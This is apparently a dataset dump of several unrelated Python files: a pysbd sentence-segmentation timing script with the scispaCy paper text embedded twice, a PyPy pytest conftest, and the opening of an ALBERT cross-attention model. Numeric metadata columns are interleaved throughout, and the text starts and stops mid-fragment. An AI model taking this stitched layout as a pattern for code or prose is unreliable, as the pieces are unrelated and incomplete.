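adj = adj + torch.eye(D)                 # self-loops, as in preprocessing()
adj = adj / adj.sum(-1, keepdim=True)    # row-normalize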
| 43.720657
| 246
| 0.538631
| 2,322
| 18,625
| 4.158484
| 0.099914
| 0.067937
| 0.022784
| 0.031483
| 0.81483
| 0.802299
| 0.78169
| 0.758389
| 0.744201
| 0.726491
| 0
| 0.026996
| 0.341691
| 18,625
| 425
| 247
| 43.823529
| 0.760542
| 0.150658
| 0
| 0.704797
| 0
| 0
| 0.000068
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.01845
| false
| 0
| 0.04428
| 0
| 0.081181
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 7
| e64b1443296bb3de720e6c1d01cf91511504828b
| 34,438
| py
| Python
| examples/test_timing_script.py
| nipunsadvilkar/pysbd
| 5905f13be4fc95f407b98392e0ec303617a33d86
| ["MIT"]
| 429
| 2019-03-27T14:42:33.000Z
| 2022-03-30T15:52:33.000Z
| examples/test_timing_script.py
| nipunsadvilkar/pysbd
| 5905f13be4fc95f407b98392e0ec303617a33d86
| ["MIT"]
| 86
| 2017-06-14T17:47:00.000Z
| 2022-02-25T07:44:42.000Z
| examples/test_timing_script.py
| nipunsadvilkar/pysbd
| 5905f13be4fc95f407b98392e0ec303617a33d86
| ["MIT"]
| 55
| 2019-04-16T17:17:39.000Z
| 2022-03-09T20:12:48.000Z
|
text = "1 Introduction The publication rate in the medical and biomedical sciences is growing at an exponential rate (Bornmann and Mutz, 2014). The information overload problem is widespread across academia, but is particularly apparent in the biomedical sciences, where individual papers may contain specific discoveries relating to a dizzying variety of genes, drugs, and proteins. In order to cope with the sheer volume of new scientific knowledge, there have been many attempts to automate the process of extracting entities, relations, protein interactions and other structured knowledge from scientific papers (Wei et al., 2016; Ammar et al., 2018; Poon et al., 2014). Although there exists a wealth of tools for processing biomedical text, many focus primarily on entity linking, negation detection and abbreviation detection. MetaMap and MetaMapLite (Aronson, 2001; Demner-Fushman et al., 2017), the two most widely used and supported tools for biomedical text processing, consider additional features, such as negation detection and acronym resolution. However, tools which cover more classical natural language processing (NLP) tasks such as the GENIA tagger (Tsuruoka et al., 2005; Tsuruoka and Tsujii, 2005) and phrase structure parsers such as those presented in (McClosky and Charniak, 2008) typically do not make use of new research innovations such as word representations or neural networks. In this paper, we introduce scispaCy, a specialized NLP library for processing biomedical texts which builds on the robust spaCy library,1 and document its performance relative to state of the art models for part of speech (POS) tagging, dependency parsing, named entity recognition (NER) and sentence segmentation. Specifically, we: • Release a reformatted version of the GENIA 1.0 (Kim et al., 2003) corpus converted into Universal Dependencies v1.0 and aligned 1spacy.io ar X iv :1 90 2. 07 66 9v 2 [ cs .C L ] 2 1 Fe b 20 19 with the original text from the PubMed abstracts. • Benchmark 9 named entity recognition models for more specific entity extraction applications demonstrating competitive performance when compared to strong baselines. • Release and evaluate two fast and convenient pipelines for biomedical text, which include tokenization, part of speech tagging, dependency parsing and named entity recognition. 2 Overview of (sci)spaCy In this section, we briefly describe the models used in the spaCy library and describe how we build on them in scispaCy. spaCy. The spaCy library (Honnibal and Montani, 2017)2 provides a variety of practical tools for text processing in multiple languages. Their models have emerged as the defacto standard for practical NLP due to their speed, robustness and close to state of the art performance. As the spaCy models are popular and the spaCy API is widely known to many potential users, we choose to build upon the spaCy library for creating a biomedical text processing pipeline. scispaCy. Our goal is to develop scispaCy as a robust, efficient and performant NLP library to satisfy the primary text processing needs in the biomedical domain. In this release of scispaCy, we retrain spaCy3 models for POS tagging, dependency parsing, and NER using datasets relevant to biomedical text, and enhance the tokenization module with additional rules. scispaCy contains two core released packages: en core sci sm and en core sci md. 
Models in the en core sci md package have a larger vocabulary and include word vectors, while those in en core sci sm have a smaller vocabulary and do not include word vectors, as shown in Table 1. Processing Speed. To emphasize the efficiency and practical utility of the end-to-end pipeline provided by scispaCy packages, we perform a speed comparison with several other publicly available processing pipelines for biomedical text using 10k randomly selected PubMed abstracts. We report 2Source code at https://github.com/ explosion/spaCy 3scispaCy models are based on spaCy version 2.0.18 results with and without segmenting the abstracts into sentences since some of the libraries (e.g., GENIA tagger) are designed to operate on sentences. As shown in Table 2, both models released in scispaCy demonstrate competitive speed to pipelines written in C++ and Java, languages designed for production settings. Whilst scispaCy is not as fast as pipelines designed for purely production use-cases (e.g., NLP4J), it has the benefit of straightforward integration with the large ecosystem of Python libraries for machine learning and text processing. Although the comparison in Table 2 is not an apples to apples comparison with other frameworks (different tasks, implementation languages etc), it is useful to understand scispaCy’s runtime in the context of other pipeline components. Running scispaCy models in addition to standard Entity Linking software such as MetaMap would result in only a marginal increase in overall runtime. In the following section, we describe the POS taggers and dependency parsers in scispaCy. 3 POS Tagging and Dependency Parsing The joint POS tagging and dependency parsing model in spaCy is an arc-eager transition-based parser trained with a dynamic oracle, similar to (Goldberg and Nivre, 2012). Features are CNN representations of token features and shared across all pipeline models (Kiperwasser and Goldberg, 2016; Zhang and Weiss, 2016). Next, we describe the data we used to train it in scispaCy. 3.1 Datasets GENIA 1.0 Dependencies. To train the dependency parser and part of speech tagger in both released models, we convert the treebank of (McClosky and Charniak, 2008),4 which is based on the GENIA 1.0 corpus (Kim et al., 2003), to Universal Dependencies v1.0 using the Stanford Dependency Converter (Schuster and Manning, 2016). As this dataset has POS tags annotated, we use it to train the POS tagger jointly with the dependency parser in both released models. As we believe the Universal Dependencies converted from the original GENIA 1.0 corpus are generally useful, we have released them as a separate contribution of this paper.5 In this data release, we also align the converted dependency parses to their original text spans in the raw, untokenized abstracts from the original release,6 and include the PubMed metadata for the abstracts which was discarded in the GENIA corpus released by McClosky and Charniak (2008). We hope that this raw format can emerge as a resource for practical evaluation in the biomedical domain of core NLP tasks such as tokenization, sentence segmentation and joint models of syntax. Finally, we also retrieve from PubMed the original metadata associated with each abstract. This includes relevant named entities linked to their Medical Subject Headings (MeSH terms) as well as chemicals and drugs linked to a variety of ontologies, as well as author metadata, publication dates, citation statistics and journal metadata. 
We hope that the community can find interesting problems for which such natural supervision can be used. 4https://nlp.stanford.edu/˜mcclosky/ biomedical.html 5Available at https://github.com/allenai/ genia-dependency-trees 6Available at http://www.geniaproject.org/ OntoNotes 5.0. To increase the robustness of the dependency parser and POS tagger to generic text, we make use of the OntoNotes 5.0 corpus7 when training the dependency parser and part of speech tagger (Weischedel et al., 2011; Hovy et al., 2006). The OntoNotes corpus consists of multiple genres of text, annotated with syntactic and semantic information, but we only use POS and dependency parsing annotations in this work. 3.2 Experiments We compare our models to the recent survey study of dependency parsing and POS tagging for biomedical data (Nguyen and Verspoor, 2018) in Tables 3 and 4. POS tagging results show that both models released in scispaCy are competitive with state of the art systems, and can be considered of equivalent practical value. In the case of dependency parsing, we find that the Biaffine parser of (Dozat and Manning, 2016) outperforms the scispaCy models by a margin of 2-3%. However, as demonstrated in Table 2, the scispaCy models are 7Instructions for download at http://cemantix. org/data/ontonotes.html approximately 9x faster due to the speed optimizations in spaCy. Robustness to Web Data. A core principle of the scispaCy models is that they are useful on a wide variety of types of text with a biomedical focus, such as clinical notes, academic papers, clinical trials reports and medical records. In order to make our models robust across a wider range of domains more generally, we experiment with incorporating training data from the OntoNotes 5.0 corpus when training the dependency parser and POS tagger. Figure 2 demonstrates the effectiveness of adding increasing percentages of web data, showing substantially improved performance on OntoNotes, at no reduction in performance on biomedical text. Note that mixing in web text during training has been applied to previous systems - the GENIA Tagger (Tsuruoka et al., 2005) also employs this technique. 4 Named Entity Recognition The NER model in spaCy is a transition-based system based on the chunking model from (Lample et al., 2016). Tokens are represented as hashed, embedded representations of the prefix, suffix, shape and lemmatized features of individual words. Next, we describe the data we used to train NER models in scispaCy. 4.1 Datasets The main NER model in both released packages in scispaCy is trained on the mention spans in the MedMentions dataset (Murty et al., 2018). Since the MedMentions dataset was originally designed for entity linking, this model recognizes a wide variety of entity types, as well as non-standard syntactic phrases such as verbs and modifiers, but the model does not predict the entity type. In order to provide for users with more specific requirements around entity types, we release four additional packages en ner {bc5cdr|craft |jnlpba|bionlp13cg} md with finer-grained NER models trained on BC5CDR (for chemicals and diseases; Li et al., 2016), CRAFT (for cell types, chemicals, proteins, genes; Bada et al., 2011), JNLPBA (for cell lines, cell types, DNAs, RNAs, proteins; Collier and Kim, 2004) and BioNLP13CG (for cancer genetics; Pyysalo et al., 2015), respectively. 
4.2 Experiments As NER is a key task for other biomedical text processing tasks, we conduct a through evaluation of the suitability of scispaCy to provide baseline performance across a wide variety of datasets. In particular, we retrain the spaCy NER model on each of the four datasets mentioned earlier (BC5CDR, CRAFT, JNLPBA, BioNLP13CG) as well as five more datasets in Crichton et al. (2017): AnatEM, BC2GM, BC4CHEMD, Linnaeus, NCBI-Disease. These datasets cover a wide variety of entity types required by different biomedical domains, including cancer genetics, disease-drug interactions, pathway analysis and trial population extraction. Additionally, they vary considerably in size and number of entities. For example, BC4CHEMD (Krallinger et al., 2015) has 84,310 annotations while Linnaeus (Gerner et al., 2009) only has 4,263. BioNLP13CG (Pyysalo et al., 2015) annotates 16 entity types while five of the datasets only annotate a single entity type.8 Table 5 provides a through comparison of the scispaCy NER models compared to a variety of models. In particular, we compare the models to strong baselines which do not consider the use of 1) multi-task learning across multiple datasets and 2) semi-supervised learning via large pretrained language models. Overall, we find that the scispaCy models are competitive baselines for 5 of the 9 datasets. Additionally, in Table 6 we evaluate the recall of the pipeline mention detector available in both 8For a detailed discussion of the datasets and their creation, we refer the reader to https://github.com/ cambridgeltl/MTL-Bioinformatics-2016/ blob/master/Additional%20file%201.pdf scispaCy models (trained on the MedMentions dataset) against all 9 specialised NER datasets. Overall, we observe a modest drop in average recall when compared directly to the MedMentions results in Table 7, but considering the diverse domains of the 9 specialised NER datasets, achieving this level of recall across datasets is already nontrivial. 5 Sentence Segmentation and Citation Handling Accurate sentence segmentation is required for many practical applications of natural language processing. Biomedical data presents many difficulties for standard sentence segmentation algorithms: abbreviated names and noun compounds containing punctuation are more common, whilst the wide range of citation styles can easily be misidentified as sentence boundaries. We evaluate sentence segmentation using both sentence and full-abstract accuracy when segmenting PubMed abstracts from the raw, untokenized GENIA development set (the Sent/Abstract columns in Table 8). Additionally, we examine the ability of the segmentation learned by our model to generalise to the body text of PubMed articles. Body text is typically more complex than abstract text, but in particular, it contains citations, which are considerably less frequent in abstract text. In order to examine the effectiveness of our models in this scenario, we design the following synthetic experiment. Given sentences from (Anonymous, 2019)9 which were originally designed for citation intent prediction, we run these sentences individually through our models. As we know that these sentences should be single sentences, we can simply count the frequency with which our models segment the individual sentences containing citations into multiple sentences (the Citation column in Table 8). 
As demonstrated by Table 8, training the dependency parser on in-domain data (both the scispaCy models) completely obviates the need for rule-based sentence segmentation. This is a positive result - rule based sentence segmentation is a brittle, time consuming process, which we have replaced with a domain specific version of an existing pipeline component. Both scispaCy models are released with the custom tokeniser, but without a custom sentence segmenter by default. 6 Related Work Apache cTakes (Savova et al., 2010) was designed specifically for clinical notes rather than the broader biomedical domain. MetaMap and MetaMapLite (Aronson, 2001; Demner-Fushman et al., 2017) from the National Library of 9Paper currently under review. Medicine focus specifically on entity linking using the Unified Medical Language System (UMLS) (Bodenreider, 2004) as a knowledge base. (Buyko et al.) adapt Apache OpenNLP using the GENIA corpus, but their system is not openly available and is less suitable for modern, Python-based workflows. The GENIA Tagger (Tsuruoka et al., 2005) provides the closest comparison to scispaCy due to it’s multi-stage pipeline, integrated research contributions and production quality runtime. We improve on the GENIA Tagger by adding a full dependency parser rather than just noun chunking, as well as improved results for NER without compromising significantly on speed. In more fundamental NLP research, the GENIA corpus (Kim et al., 2003) has been widely used to evaluate transfer learning and domain adaptation. (McClosky et al., 2006) demonstrate the effectiveness of self-training and parse re-ranking for domain adaptation. (Rimell and Clark, 2008) adapt a CCG parser using only POS and lexical categories, while (Joshi et al., 2018) extend a neural phrase structure parser trained on web text to the biomedical domain with a small number of partially annotated examples. These papers focus mainly of the problem of domain adaptation itself, rather than the objective of obtaining a robust, high-performance parser using existing resources. NLP techniques, and in particular, distant supervision have been employed to assist the curation of large, structured biomedical resources. (Poon et al., 2015) extract 1.5 million cancer path- way interactions from PubMed abstracts, leading to the development of Literome (Poon et al., 2014), a search engine for genic pathway interactions and genotype-phenotype interactions. A fundamental aspect of (Valenzuela-Escarcega et al., 2018; Poon et al., 2014) is the use of hand-written rules and triggers for events based on dependency tree paths; the connection to the application of scispaCy is quite apparent. 7 Conclusion In this paper we presented several robust model pipelines for a variety of natural language processing tasks focused on biomedical text. The scispaCy models are fast, easy to use, scalable, and achieve close to state of the art performance. We hope that the release of these models enables new applications in biomedical information extraction whilst making it easy to leverage high quality syntactic annotation for downstream tasks. Additionally, we released a reformatted GENIA 1.0 corpus augmented with automatically produced Universal Dependency annotations and recovered and aligned original abstract metadata. 1 Introduction The publication rate in the medical and biomedical sciences is growing at an exponential rate (Bornmann and Mutz, 2014). 
The information overload problem is widespread across academia, but is particularly apparent in the biomedical sciences, where individual papers may contain specific discoveries relating to a dizzying variety of genes, drugs, and proteins. In order to cope with the sheer volume of new scientific knowledge, there have been many attempts to automate the process of extracting entities, relations, protein interactions and other structured knowledge from scientific papers (Wei et al., 2016; Ammar et al., 2018; Poon et al., 2014). Although there exists a wealth of tools for processing biomedical text, many focus primarily on entity linking, negation detection and abbreviation detection. MetaMap and MetaMapLite (Aronson, 2001; Demner-Fushman et al., 2017), the two most widely used and supported tools for biomedical text processing, consider additional features, such as negation detection and acronym resolution. However, tools which cover more classical natural language processing (NLP) tasks such as the GENIA tagger (Tsuruoka et al., 2005; Tsuruoka and Tsujii, 2005) and phrase structure parsers such as those presented in (McClosky and Charniak, 2008) typically do not make use of new research innovations such as word representations or neural networks. In this paper, we introduce scispaCy, a specialized NLP library for processing biomedical texts which builds on the robust spaCy library,1 and document its performance relative to state of the art models for part of speech (POS) tagging, dependency parsing, named entity recognition (NER) and sentence segmentation. Specifically, we: • Release a reformatted version of the GENIA 1.0 (Kim et al., 2003) corpus converted into Universal Dependencies v1.0 and aligned 1spacy.io ar X iv :1 90 2. 07 66 9v 2 [ cs .C L ] 2 1 Fe b 20 19 with the original text from the PubMed abstracts. • Benchmark 9 named entity recognition models for more specific entity extraction applications demonstrating competitive performance when compared to strong baselines. • Release and evaluate two fast and convenient pipelines for biomedical text, which include tokenization, part of speech tagging, dependency parsing and named entity recognition. 2 Overview of (sci)spaCy In this section, we briefly describe the models used in the spaCy library and describe how we build on them in scispaCy. spaCy. The spaCy library (Honnibal and Montani, 2017)2 provides a variety of practical tools for text processing in multiple languages. Their models have emerged as the defacto standard for practical NLP due to their speed, robustness and close to state of the art performance. As the spaCy models are popular and the spaCy API is widely known to many potential users, we choose to build upon the spaCy library for creating a biomedical text processing pipeline. scispaCy. Our goal is to develop scispaCy as a robust, efficient and performant NLP library to satisfy the primary text processing needs in the biomedical domain. In this release of scispaCy, we retrain spaCy3 models for POS tagging, dependency parsing, and NER using datasets relevant to biomedical text, and enhance the tokenization module with additional rules. scispaCy contains two core released packages: en core sci sm and en core sci md. Models in the en core sci md package have a larger vocabulary and include word vectors, while those in en core sci sm have a smaller vocabulary and do not include word vectors, as shown in Table 1. Processing Speed. 
To emphasize the efficiency and practical utility of the end-to-end pipeline provided by scispaCy packages, we perform a speed comparison with several other publicly available processing pipelines for biomedical text using 10k randomly selected PubMed abstracts. We report 2Source code at https://github.com/ explosion/spaCy 3scispaCy models are based on spaCy version 2.0.18 results with and without segmenting the abstracts into sentences since some of the libraries (e.g., GENIA tagger) are designed to operate on sentences. As shown in Table 2, both models released in scispaCy demonstrate competitive speed to pipelines written in C++ and Java, languages designed for production settings. Whilst scispaCy is not as fast as pipelines designed for purely production use-cases (e.g., NLP4J), it has the benefit of straightforward integration with the large ecosystem of Python libraries for machine learning and text processing. Although the comparison in Table 2 is not an apples to apples comparison with other frameworks (different tasks, implementation languages etc), it is useful to understand scispaCy’s runtime in the context of other pipeline components. Running scispaCy models in addition to standard Entity Linking software such as MetaMap would result in only a marginal increase in overall runtime. In the following section, we describe the POS taggers and dependency parsers in scispaCy. 3 POS Tagging and Dependency Parsing The joint POS tagging and dependency parsing model in spaCy is an arc-eager transition-based parser trained with a dynamic oracle, similar to (Goldberg and Nivre, 2012). Features are CNN representations of token features and shared across all pipeline models (Kiperwasser and Goldberg, 2016; Zhang and Weiss, 2016). Next, we describe the data we used to train it in scispaCy. 3.1 Datasets GENIA 1.0 Dependencies. To train the dependency parser and part of speech tagger in both released models, we convert the treebank of (McClosky and Charniak, 2008),4 which is based on the GENIA 1.0 corpus (Kim et al., 2003), to Universal Dependencies v1.0 using the Stanford Dependency Converter (Schuster and Manning, 2016). As this dataset has POS tags annotated, we use it to train the POS tagger jointly with the dependency parser in both released models. As we believe the Universal Dependencies converted from the original GENIA 1.0 corpus are generally useful, we have released them as a separate contribution of this paper.5 In this data release, we also align the converted dependency parses to their original text spans in the raw, untokenized abstracts from the original release,6 and include the PubMed metadata for the abstracts which was discarded in the GENIA corpus released by McClosky and Charniak (2008). We hope that this raw format can emerge as a resource for practical evaluation in the biomedical domain of core NLP tasks such as tokenization, sentence segmentation and joint models of syntax. Finally, we also retrieve from PubMed the original metadata associated with each abstract. This includes relevant named entities linked to their Medical Subject Headings (MeSH terms) as well as chemicals and drugs linked to a variety of ontologies, as well as author metadata, publication dates, citation statistics and journal metadata. We hope that the community can find interesting problems for which such natural supervision can be used. 
4https://nlp.stanford.edu/˜mcclosky/ biomedical.html 5Available at https://github.com/allenai/ genia-dependency-trees 6Available at http://www.geniaproject.org/ OntoNotes 5.0. To increase the robustness of the dependency parser and POS tagger to generic text, we make use of the OntoNotes 5.0 corpus7 when training the dependency parser and part of speech tagger (Weischedel et al., 2011; Hovy et al., 2006). The OntoNotes corpus consists of multiple genres of text, annotated with syntactic and semantic information, but we only use POS and dependency parsing annotations in this work. 3.2 Experiments We compare our models to the recent survey study of dependency parsing and POS tagging for biomedical data (Nguyen and Verspoor, 2018) in Tables 3 and 4. POS tagging results show that both models released in scispaCy are competitive with state of the art systems, and can be considered of equivalent practical value. In the case of dependency parsing, we find that the Biaffine parser of (Dozat and Manning, 2016) outperforms the scispaCy models by a margin of 2-3%. However, as demonstrated in Table 2, the scispaCy models are 7Instructions for download at http://cemantix. org/data/ontonotes.html approximately 9x faster due to the speed optimizations in spaCy. Robustness to Web Data. A core principle of the scispaCy models is that they are useful on a wide variety of types of text with a biomedical focus, such as clinical notes, academic papers, clinical trials reports and medical records. In order to make our models robust across a wider range of domains more generally, we experiment with incorporating training data from the OntoNotes 5.0 corpus when training the dependency parser and POS tagger. Figure 2 demonstrates the effectiveness of adding increasing percentages of web data, showing substantially improved performance on OntoNotes, at no reduction in performance on biomedical text. Note that mixing in web text during training has been applied to previous systems - the GENIA Tagger (Tsuruoka et al., 2005) also employs this technique. 4 Named Entity Recognition The NER model in spaCy is a transition-based system based on the chunking model from (Lample et al., 2016). Tokens are represented as hashed, embedded representations of the prefix, suffix, shape and lemmatized features of individual words. Next, we describe the data we used to train NER models in scispaCy. 4.1 Datasets The main NER model in both released packages in scispaCy is trained on the mention spans in the MedMentions dataset (Murty et al., 2018). Since the MedMentions dataset was originally designed for entity linking, this model recognizes a wide variety of entity types, as well as non-standard syntactic phrases such as verbs and modifiers, but the model does not predict the entity type. In order to provide for users with more specific requirements around entity types, we release four additional packages en ner {bc5cdr|craft |jnlpba|bionlp13cg} md with finer-grained NER models trained on BC5CDR (for chemicals and diseases; Li et al., 2016), CRAFT (for cell types, chemicals, proteins, genes; Bada et al., 2011), JNLPBA (for cell lines, cell types, DNAs, RNAs, proteins; Collier and Kim, 2004) and BioNLP13CG (for cancer genetics; Pyysalo et al., 2015), respectively. 4.2 Experiments As NER is a key task for other biomedical text processing tasks, we conduct a through evaluation of the suitability of scispaCy to provide baseline performance across a wide variety of datasets. 
In particular, we retrain the spaCy NER model on each of the four datasets mentioned earlier (BC5CDR, CRAFT, JNLPBA, BioNLP13CG) as well as five more datasets in Crichton et al. (2017): AnatEM, BC2GM, BC4CHEMD, Linnaeus, NCBI-Disease. These datasets cover a wide variety of entity types required by different biomedical domains, including cancer genetics, disease-drug interactions, pathway analysis and trial population extraction. Additionally, they vary considerably in size and number of entities. For example, BC4CHEMD (Krallinger et al., 2015) has 84,310 annotations while Linnaeus (Gerner et al., 2009) only has 4,263. BioNLP13CG (Pyysalo et al., 2015) annotates 16 entity types while five of the datasets only annotate a single entity type.8 Table 5 provides a through comparison of the scispaCy NER models compared to a variety of models. In particular, we compare the models to strong baselines which do not consider the use of 1) multi-task learning across multiple datasets and 2) semi-supervised learning via large pretrained language models. Overall, we find that the scispaCy models are competitive baselines for 5 of the 9 datasets. Additionally, in Table 6 we evaluate the recall of the pipeline mention detector available in both 8For a detailed discussion of the datasets and their creation, we refer the reader to https://github.com/ cambridgeltl/MTL-Bioinformatics-2016/ blob/master/Additional%20file%201.pdf scispaCy models (trained on the MedMentions dataset) against all 9 specialised NER datasets. Overall, we observe a modest drop in average recall when compared directly to the MedMentions results in Table 7, but considering the diverse domains of the 9 specialised NER datasets, achieving this level of recall across datasets is already nontrivial. 5 Sentence Segmentation and Citation Handling Accurate sentence segmentation is required for many practical applications of natural language processing. Biomedical data presents many difficulties for standard sentence segmentation algorithms: abbreviated names and noun compounds containing punctuation are more common, whilst the wide range of citation styles can easily be misidentified as sentence boundaries. We evaluate sentence segmentation using both sentence and full-abstract accuracy when segmenting PubMed abstracts from the raw, untokenized GENIA development set (the Sent/Abstract columns in Table 8). Additionally, we examine the ability of the segmentation learned by our model to generalise to the body text of PubMed articles. Body text is typically more complex than abstract text, but in particular, it contains citations, which are considerably less frequent in abstract text. In order to examine the effectiveness of our models in this scenario, we design the following synthetic experiment. Given sentences from (Anonymous, 2019)9 which were originally designed for citation intent prediction, we run these sentences individually through our models. As we know that these sentences should be single sentences, we can simply count the frequency with which our models segment the individual sentences containing citations into multiple sentences (the Citation column in Table 8). As demonstrated by Table 8, training the dependency parser on in-domain data (both the scispaCy models) completely obviates the need for rule-based sentence segmentation. This is a positive result - rule based sentence segmentation is a brittle, time consuming process, which we have replaced with a domain specific version of an existing pipeline component. 
Both scispaCy models are released with the custom tokeniser, but without a custom sentence segmenter by default. 6 Related Work Apache cTakes (Savova et al., 2010) was designed specifically for clinical notes rather than the broader biomedical domain. MetaMap and MetaMapLite (Aronson, 2001; Demner-Fushman et al., 2017) from the National Library of 9Paper currently under review. Medicine focus specifically on entity linking using the Unified Medical Language System (UMLS) (Bodenreider, 2004) as a knowledge base. (Buyko et al.) adapt Apache OpenNLP using the GENIA corpus, but their system is not openly available and is less suitable for modern, Python-based workflows. The GENIA Tagger (Tsuruoka et al., 2005) provides the closest comparison to scispaCy due to it’s multi-stage pipeline, integrated research contributions and production quality runtime. We improve on the GENIA Tagger by adding a full dependency parser rather than just noun chunking, as well as improved results for NER without compromising significantly on speed. In more fundamental NLP research, the GENIA corpus (Kim et al., 2003) has been widely used to evaluate transfer learning and domain adaptation. (McClosky et al., 2006) demonstrate the effectiveness of self-training and parse re-ranking for domain adaptation. (Rimell and Clark, 2008) adapt a CCG parser using only POS and lexical categories, while (Joshi et al., 2018) extend a neural phrase structure parser trained on web text to the biomedical domain with a small number of partially annotated examples. These papers focus mainly of the problem of domain adaptation itself, rather than the objective of obtaining a robust, high-performance parser using existing resources. NLP techniques, and in particular, distant supervision have been employed to assist the curation of large, structured biomedical resources. (Poon et al., 2015) extract 1.5 million cancer path- way interactions from PubMed abstracts, leading to the development of Literome (Poon et al., 2014), a search engine for genic pathway interactions and genotype-phenotype interactions. A fundamental aspect of (Valenzuela-Escarcega et al., 2018; Poon et al., 2014) is the use of hand-written rules and triggers for events based on dependency tree paths; the connection to the application of scispaCy is quite apparent. 7 Conclusion In this paper we presented several robust model pipelines for a variety of natural language processing tasks focused on biomedical text. The scispaCy models are fast, easy to use, scalable, and achieve close to state of the art performance. We hope that the release of these models enables new applications in biomedical information extraction whilst making it easy to leverage high quality syntactic annotation for downstream tasks. Additionally, we released a reformatted GENIA 1.0 corpus augmented with automatically produced Universal Dependency annotations and recovered and aligned original abstract metadata."
import pysbd
import time
import cProfile
from tqdm import tqdm
segmenter = pysbd.Segmenter(language='en', clean=False)
n_trials = 10
times = []
for i in tqdm(range(n_trials)):
start = time.time()
# segments = cProfile.run('segmenter.segment(text)')
segments = segmenter.segment(text)
end = time.time()
times.append(end-start)
print("Total seconds {}".format(sum(times)))
print("Num trials {}".format(n_trials))
print("Average second {}".format(sum(times)/n_trials))
| 1,639.904762
| 33,948
| 0.813781
| 5,389
| 34,438
| 5.20115
| 0.155688
| 0.008563
| 0.008134
| 0.00371
| 0.987763
| 0.987763
| 0.987763
| 0.987763
| 0.987763
| 0.987763
| 0
| 0.022175
| 0.151461
| 34,438
| 21
| 33,949
| 1,639.904762
| 0.936726
| 0.001452
| 0
| 0
| 0
| 0.0625
| 0.988368
| 0.008143
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.25
| 0
| 0.25
| 0.1875
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 9
| 05178c7d44b067c167fe229ab177cf37ed5b6ef7
| 156
| py
| Python
| pypy/rlib/rsre/test/conftest.py
| benoitc/pypy
| a3e1b12d1d01dc29056b7badc051ffc034297658
| ["MIT"]
| 1
| 2020-01-21T11:10:51.000Z
| 2020-01-21T11:10:51.000Z
| pypy/rlib/rsre/test/conftest.py
| benoitc/pypy
| a3e1b12d1d01dc29056b7badc051ffc034297658
| ["MIT"]
| null
| null
| null
| pypy/rlib/rsre/test/conftest.py
| benoitc/pypy
| a3e1b12d1d01dc29056b7badc051ffc034297658
| ["MIT"]
| null
| null
| null
|
# import the option --viewloops from the JIT
def pytest_addoption(parser):
from pypy.jit.conftest import pytest_addoption
pytest_addoption(parser)
| 26
| 50
| 0.782051
| 21
| 156
| 5.666667
| 0.571429
| 0.378151
| 0.352941
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.153846
| 156
| 5
| 51
| 31.2
| 0.901515
| 0.269231
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 7
| 05967a50474dfe54603d24be5644c0ae7fddd275
| 17,141
| py
| Python
| CODE/model/HH_linear.py
| Zaaachary/CSQA
| 6da6e076f67e9458deacb665d31463db14c7d860
| ["BSD-3-Clause"]
| null
| null
| null
| CODE/model/HH_linear.py
| Zaaachary/CSQA
| 6da6e076f67e9458deacb665d31463db14c7d860
| ["BSD-3-Clause"]
| null
| null
| null
| CODE/model/HH_linear.py
| Zaaachary/CSQA
| 6da6e076f67e9458deacb665d31463db14c7d860
| ["BSD-3-Clause"]
| null
| null
| null
|
#! -*- encoding:utf-8 -*-
"""
@File : HH_linear.py
@Author : Zachary Li
@Contact : li_zaaachary@163.com
@Dscpt :
"""
import math
import torch
import torch.nn as nn
import torch.nn.functional as F
from transformers import (AlbertModel, AlbertPreTrainedModel, BertModel,
BertPreTrainedModel)
from utils import common
class AlbertCrossAttn(AlbertPreTrainedModel):
'''
input_ids [b, 5, seq_len] => [5b, seq_len]
=> PTM
cs_encoding [5b, cs_len, cs_seq_len, hidden]
query_encoding [5b, query_len, hidden] => [5b, cs_len, query_len, hidden]
=> cross_attn
qc_attoutput [5b, cs_len, query_seq_len, hidden]
cq_attoutput [5b, cs_len, cs_seq_len, hidden]
'''
def __init__(self, config, **kwargs):
super(AlbertCrossAttn, self).__init__(config)
# length config
self.cs_num = kwargs['cs_num']
self.max_cs_len = kwargs['max_cs_len']
self.max_qa_len = kwargs['max_qa_len']
# modules
self.albert = AlbertModel(config)
self.cross_att = AttentionLayer(config.hidden_size, self.cs_num)
self.cs_merge = AttentionMerge(config.hidden_size, config.hidden_size//4)
self.qu_merge = AttentionMerge(config.hidden_size, config.hidden_size//4)
self.scorer = nn.Sequential(
nn.Dropout(0.1),
nn.Linear(config.hidden_size * 3, 1)
)
self.init_weights()
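# Construction sketch (hypothetical checkpoint name and sizes, not from the
# original file); transformers' from_pretrained forwards unused keyword
# arguments to __init__, so the extra length kwargs can be passed directly:
#   model = AlbertCrossAttn.from_pretrained(
#       'albert-base-v2', cs_num=4, max_cs_len=20, max_qa_len=60)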
def forward(self, input_ids, attention_mask, token_type_ids, labels):
logits = self._forward(input_ids, attention_mask, token_type_ids)
loss = F.cross_entropy(logits, labels)
with torch.no_grad():
logits = F.softmax(logits, dim=1)
predicts = torch.argmax(logits, dim=1)
right_num = torch.sum(predicts == labels)
return loss, right_num
def _forward(self, input_ids=None, attention_mask=None, token_type_ids=None):
# [B, 5, L] => [B * 5, L]
flat_input_ids = input_ids.view(-1, input_ids.size(-1))
flat_attention_mask = attention_mask.view(-1, attention_mask.size(-1))
flat_token_type_ids = token_type_ids.view(-1, token_type_ids.size(-1))
outputs = self.albert(
